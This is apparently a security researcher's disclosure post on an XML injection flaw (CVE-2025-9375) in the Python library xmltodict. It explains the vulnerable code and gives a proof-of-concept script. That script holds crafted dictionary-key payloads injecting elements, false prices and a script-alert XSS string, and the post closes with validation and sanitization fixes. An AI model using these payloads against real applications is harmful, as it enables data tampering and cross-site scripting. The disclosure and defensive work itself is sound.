CVE-2025-9375: XML Injection Vulnerability in xmltodict 0.14.2 - Mono

691 words

3 minutes

CVE-2025-9375: XML Injection Vulnerability in xmltodict 0.14.2 - Mono

2025-08-25

Security Research

security

/

xml

/

python

/

cve

/

hacking

/

web-security

Cover image for CVE-2025-9375: XML Injection Vulnerability in xmltodict 0.14.2 - Mono

Executive Summary#

I discovered an XML Injection vulnerability in xmltodict version 0.14.2, a popular Python library with over 1.5 million weekly downloads on PyPI. This vulnerability allows attackers to inject arbitrary XML markup through crafted dictionary keys, potentially leading to XML structure manipulation, data corruption, and in web contexts, cross-site scripting (XSS) attacks.

The vulnerability stems from insufficient input validation in the _emit function, where user-controlled dictionary keys are directly used as XML tag names without any sanitization or validation.

Background: Understanding xmltodict#

xmltodict is a Python library that provides bidirectional conversion between XML and Python dictionaries. Its primary functions are:

xmltodict.parse() - Converts XML to Python dictionaries
xmltodict.unparse() - Converts Python dictionaries back to XML

The library is widely used in web applications, APIs, and data processing pipelines where XML manipulation is required. Its popularity makes this vulnerability particularly concerning from a supply chain security perspective.

Technical Analysis#

The Vulnerable Code Path#

The vulnerability resides in the _emit function within xmltodict.py (lines 378-451). Let’s examine the critical code path:

1
def _emit(key, value, content_handler,
2
          attr_prefix='@',
3
          cdata_key='#text',
4
          depth=0,
5
          preprocessor=None,
6
          pretty=False,
7
          newl='\n',
8
          indent='\t',
9
          namespace_separator=':',
10
          namespaces=None,
11
          full_document=True,
12
          expand_iter=None):
13
    key = _process_namespace(key, namespaces, namespace_separator, attr_prefix)
14
    if preprocessor is not None:
15
        result = preprocessor(key, value)
16
        if result is None:
17
            return
18
        key, value = result
19
    # ... processing logic ...
20

21
    # VULNERABLE LINE: Direct use of user input as XML tag
22
    content_handler.startElement(key, AttributesImpl(attrs))  # Line 436
23

24
    # ... more processing ...
25

26
    content_handler.endElement(key)  # Line 449

Root Cause Analysis#

The vulnerability occurs because:

No Input Validation: The key parameter (dictionary keys from user input) is used directly as an XML element name
Missing Sanitization: No escaping or validation is performed on the key before passing it to startElement()
Trust Assumption: The code assumes dictionary keys are safe XML tag names

XML Tag Name Requirements vs Reality#

Valid XML tag names must follow these rules:

Start with a letter or underscore
Contain only letters, digits, hyphens, periods, and underscores
Cannot contain spaces or special characters like <, >, &

The vulnerability exploits the fact that xmltodict doesn’t enforce these constraints.

Exploitation Scenarios#

Basic XML Structure Manipulation#

Payload:

1
malicious_data = {"item><injected>malicious content</injected><item": "value"}
2
xml_output = xmltodict.unparse(malicious_data, full_document=False)
3
print(xml_output)

Output:

1
<item><injected>malicious content</injected><item>value</item><injected>malicious content</injected><item>

The injected XML breaks the intended structure and introduces arbitrary elements.

Advanced Multi-Stage Injection#

Payload:

1
complex_payload = {
2
    "product><price>999999</price><description>HACKED": "legitimate_value",
3
    "legitimate_field": "normal_data"
4
}

This could manipulate e-commerce XML data by injecting false pricing information.

Web Application Context#

In web applications that render XML output in browsers:

Payload:

1
xss_payload = {"item><script>alert('XSS')</script><item": "data"}

When this XML is rendered in a web context without proper escaping, it results in JavaScript execution.

Proof of Concept#

Here’s a complete demonstration:

1
#!/usr/bin/env python3
2
import xmltodict
3

4
def demonstrate_xml_injection():
5
    """Demonstrates the XML injection vulnerability"""
6

7
    print("=== CVE-2025-9375 XML Injection PoC ===\n")
8

9
    # Test Case 1: Basic structure breaking
10
    print("1. Basic XML structure manipulation:")
11
    payload1 = {"item><injected>MALICIOUS CONTENT</injected><dummy": "value"}
12
    result1 = xmltodict.unparse(payload1, full_document=False)
13
    print(f"Input: {payload1}")
14
    print(f"Output: {result1}")
15
    print()
16

17
    # Test Case 2: Attribute injection
18
    print("2. Attribute injection:")
19
    payload2 = {"item attribute='malicious'": "value"}
20
    result2 = xmltodict.unparse(payload2, full_document=False)
21
    print(f"Input: {payload2}")
22
    print(f"Output: {result2}")
23
    print()
24

25
    # Test Case 3: CDATA breaking
26
    print("3. CDATA section injection:")
27
    payload3 = {"item><![CDATA[]]><script>alert('XSS')</script><dummy": "value"}
28
    result3 = xmltodict.unparse(payload3, full_document=False)
29
    print(f"Input: {payload3}")
30
    print(f"Output: {result3}")
31
    print()
32

33
if __name__ == "__main__":
34
    demonstrate_xml_injection()

Expected Output:

1
=== CVE-2025-9375 XML Injection PoC ===
2

3
1. Basic XML structure manipulation:
4
Input: {'item><injected>MALICIOUS CONTENT</injected><dummy': 'value'}
5
Output: <item><injected>MALICIOUS CONTENT</injected><dummy>value</item><injected>MALICIOUS CONTENT</injected><dummy>
6

7
2. Attribute injection:
8
Input: {"item attribute='malicious'": 'value'}
9
Output: <item attribute='malicious'>value</item attribute='malicious'>
10

11
3. CDATA section injection:
12
Input: {"item><![CDATA[]]><script>alert('XSS')</script><dummy": 'value'}
13
Output: <item><![CDATA[]]><script>alert('XSS')</script><dummy>value</item><![CDATA[]]><script>alert('XSS')</script><dummy>

Impact Assessment#

Real-World Impact Scenarios#

API Data Corruption: REST APIs using xmltodict for XML responses could have their data structure corrupted
Configuration File Manipulation: Applications that generate XML config files could be compromised
Web Application XSS: When XML output is rendered in browsers, XSS attacks become possible
Data Processing Pipelines: ETL processes could inject malicious data into downstream systems
Document Generation: PDF or report generators using XML templates could be manipulated

Affected Systems#

Any application using xmltodict.unparse() with user-controlled dictionary keys is vulnerable:

Web APIs converting JSON to XML
Configuration management systems
Data transformation pipelines
Document generation services
Integration platforms

Mitigation Strategies#

Input Validation: Validate dictionary keys before passing to unparse()

1
import re
2
def safe_xml_key(key):
3
    # Only allow valid XML name characters
4
    return re.match(r'^[a-zA-Z_][a-zA-Z0-9_.-]*$', key) is not None

Key Sanitization: Sanitize keys to remove dangerous characters

1
def sanitize_dict_keys(data):
2
    if isinstance(data, dict):
3
        sanitized = {}
4
        for key, value in data.items():
5
            # Replace invalid characters
6
            safe_key = re.sub(r'[^a-zA-Z0-9_.-]', '_', str(key))
7
            sanitized[safe_key] = sanitize_dict_keys(value)
8
        return sanitized
9
    return data